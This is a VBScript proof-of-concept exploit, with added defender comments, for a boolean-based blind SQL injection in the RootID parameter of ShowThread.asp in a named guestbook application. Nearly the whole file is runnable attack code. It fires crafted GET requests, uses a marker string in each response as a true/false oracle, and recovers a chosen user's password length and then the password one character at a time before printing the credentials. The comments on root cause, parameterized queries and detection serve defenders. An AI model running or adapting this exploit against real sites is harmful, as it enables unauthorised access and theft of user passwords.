' Legacy proof-of-concept (VBScript, run under cscript.exe) for a boolean-based blind
' SQL injection in the RootID parameter of ShowThread.asp in the application named in
' the banner below. Each probe appends an "and exists (select ...)" subquery to the
' URL and treats the presence of a caller-supplied marker string ("flag") in the
' response as the true/false oracle; the password length is found first, then the
' password one character per position.
' Defender notes:
'   * Root cause on the application side: SQL assembled by string concatenation from a
'     query-string value. Mitigation is parameterized queries (ADO Command parameters)
'     and server-side type checking of RootID. The probe also only works if userpwd is
'     stored in clear text, since it compares left(userpwd, j) against literal characters.
'   * Detection: a burst of sequential GET requests to ShowThread.asp whose query string
'     contains "exists (select" together with len(...) or left(...) and an incrementing
'     numeric or string literal; the two request templates are visible further down.
dim pwd,username,sql,i,strings,pwd_len,flag
' Usage banner: exactly three arguments are required (url, username, flag).
If WScript.Arguments.Count <>3 then
    wscript.echo string(78,"*")
    ' vbcrcrlflfcrlf is not a VBScript constant; without Option Explicit the undeclared
    ' name is Empty, so this line echoes an empty string.
    wscript.echo vbcrcrlflfcrlf
    wscript.echo vbtab&"风月同学录V1.60漏洞测试脚本 code by 2b007"
    wscript.echo "usage:cscript.exe "&WScript.ScriptFullName&" http://path username flag"
    wscript.echo "path:一般为xxx.com/txl/ShowThread.asp?RootID=xxx"
    wscript.echo "username: 你要破解的用户名"
    wscript.echo "flag:正确页面的字符并且是e文的"
    wscript.echo vbcrcrlflfcrlf
    wscript.echo string(78,"*")
    wscript.quit
end if
username=WScript.Arguments(1)
pwd = ""
flag=WScript.Arguments(2) ' a string from the normal (true-condition) page; ASCII is preferred
' character set probed at each password position; characters outside it are never found
strings = "0123456789abcdefghijklmnopqrstuvwxyz"
banner=string(65,"*")&vbcrlf&vbcrlf&vbtab&" 风月同学录V1.60漏洞测试脚本 code by "&_
"2b007"&vbcrlf&vbcrlf&string(65,"*")
wscript.echo banner
wscript.echo "cjecking pwdlen of " &username &" ……"
' target URL, lower-cased; the injection text is appended to it URL-encoded
iRemote = LCase(WScript.Arguments(0))
Set xPost = CreateObject("Microsoft.XMLHTTP")
' Phase 1: password length. Probes len(userpwd) = 1..128; the first response that
' still contains the marker fixes pwd_len (stored as a string). If no probe matches,
' pwd_len stays Empty and the phase-2 loop below does not run.
for i=1 to 128 step 1
    sql=iRemote&"%20and%20exists%20(select%20userid%20from%20student%20where%20len(userpwd)='"&i&_
"'%20and%20userid='" & username & "')"
    xPost.Open "GET",sql,0 ' third argument 0 = synchronous request
    xPost.Send()
    If instr(xPost.responseText, flag) <> 0 Then
        pwd_len = "" & i & ""
        Exit For
    End If
Next
wscript.echo "pwdlen="&pwd_len
wscript.echo "checking password ……"
' Phase 2: one position at a time. For position j, each candidate character is tested
' with left(userpwd, j) = <prefix recovered so far> & <candidate>; the first match is
' appended to pwd. If no candidate matches at a position, nothing is appended and the
' outer loop simply moves on to the next position.
For j = 1 to pwd_len step 1
    For k = 1 to len(strings) step 1
        sql = iRemote&"%20and%20exists%20(select%20userid%20from%20student%20where%20left(userpwd," & j & ")='" & pwd & mid(strings,k,1) & "'%20and%20userid='" & username & "')"
        xPost.Open "GET",sql,0
        xPost.Send()
        If instr(xPost.responseText, flag) <> 0 Then
            pwd = pwd & mid(strings,k,1)
            Exit For
        End If
    Next
Next
' error-reporting branch; otherwise print the recovered credentials
If err Then
    WScript.Echo "错误:" & Error.Description
    Error.Clear
Else
    ' print the password
    wscript.echo "uesrname: " & username
    WScript.Echo "password: " & pwd
End If
Set xPost= nothing